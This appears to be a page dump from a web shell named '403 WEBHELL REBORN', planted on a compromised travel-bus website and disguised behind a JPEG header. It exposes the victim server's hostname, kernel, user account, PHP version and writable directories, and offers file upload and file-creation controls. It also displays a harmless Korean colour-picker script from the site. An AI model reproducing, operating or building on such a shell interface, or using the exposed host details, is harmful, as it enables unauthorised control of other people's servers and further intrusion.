ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/js/wincolor.js
/**
 * 윈도우 색상선택창 이용한 컬러피커
 *
 * 작성일 : 2010.11.11
 */

document.write('<object id="dlgHelper" classid="clsid:3050f819-98b5-11cf-bb82-00aa00bdce0b" width="0" height="0"></object>');

function callColorDlg(id, bg_id) {
	var obj = (typeof(id) == 'string') ? document.getElementById(id) : id;
	var obj_bg = (typeof(bg_id) == 'string') ? document.getElementById(bg_id) : bg_id;

	var sColor = dlgHelper.ChooseColorDlg();
	sColor = sColor.toString(16);

	if (sColor.length < 6) {
		var sTempString = '000000'.substring(0,6-sColor.length);
		sColor = sTempString.concat(sColor);
	}

	//if (sColor == '000000') sColor = "020202";

	if (obj) obj.value = '#' + sColor;
	if (obj_bg) obj_bg.style.backgroundColor = '#' + sColor;
}

Anon7 - 2021